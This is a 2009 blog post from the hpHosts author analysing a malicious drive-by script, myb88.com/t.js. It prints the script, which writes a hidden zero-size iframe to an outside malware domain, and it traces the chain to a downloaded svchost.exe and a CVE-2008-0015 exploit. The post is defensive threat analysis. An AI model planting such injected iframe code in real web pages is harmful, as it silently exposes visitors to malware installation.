Blog for hpHosts, and whatever else I feel like writing about ....

Thursday 9 July 2009

myb88.com/t.js - A quick analysis

I thought I'd give you guys a quick analysis of what myb88.com/t.js (IP: 203.158.16.18), as mentioned by DNS-BH, actually does. The first thing we need to look at, is the contents of t.js;

var s,siteUrl,tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
{
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0){
document.writeln("<iframe src=http://bybyybyb.com/aa/a1a.htm?4 width=0 height=0></iframe>");
}
document.write ('<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/985098/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/985098/ystat.gif"/></a></noscript>');


From here, we can see that it is loading an iFrame to bybyybyb.com (59.34.197.154 - AS4134), based on whether tmpdomain is equal to zero (which is based on whether or not the URL matches any of the items in the arydomain array). This iFrame, then loads another iframe to index.htm which contains;

<html>
<body>
<div id="DivID">
<script src='go.jpg'></script>
<script src='go1.jpg'></script>
</body>
</html>


You'll not be surprised to learn that these .jpg files, aren't infact, .jpg files. go.jpg contains the shell code;



If we run this through Wepawet (saves us alot of time), we see it grabs a file called svchost.exe from z999hu.cn (121.14.218.162 - AS4134), MD5: 78ffb67eb9e8ec2886fcb5e32c916333;

http://wepawet.cs.ucsb.edu/view.php?hash=92b82fa85cc9fb0206b7eca725c3ce42&type=js

Detection for this is pretty good, with 28/41 vendors currently detecting it;

http://www.virustotal.com/analisis/ebcf13901c7d5a12dc0a2f4e5e588276a9dfc1693672b61d1339933f77e0b04b-1247156133

go1.jpg attempts a buffer overflow (CVE-2008-0015), and detection is sadly, rubbish;

http://www.virustotal.com/analisis/673d9d2ff901f08991354fe28798bfe7f18346492d1e5987caf788e4da79eee5-1247118784



References:

vURL Online - myb88.com/t.js
http://vurl.mysteryfcm.co.uk/?url=713642

hpHosts - 261 Domains listed resolving to: 59.34.197.
http://hosts-file.net/pest.asp?show=59.34.197.

Microsoft Security Advisory (972890) - Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/972890.mspx

Google Diagnostic - AS4134
http://www.google.com/safebrowsing/diagnostic?site=AS:4134&hl=en

IE 0day exploit domains (constantly updated)
http://isc.sans.org/diary.php?storyid=6739

IE (msvidctl.dll) to 0-day attack (Google translation)
http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=IE(msvidctl.dll)+%A4%D8%A4%CE+0-day+attack

New MS 0-day ActiveX (MSVidCtl dll exploit)
http://infosec20.blogspot.com/2009/07/new-ms-0-day-activex-msvidctl-dll.html

No comments: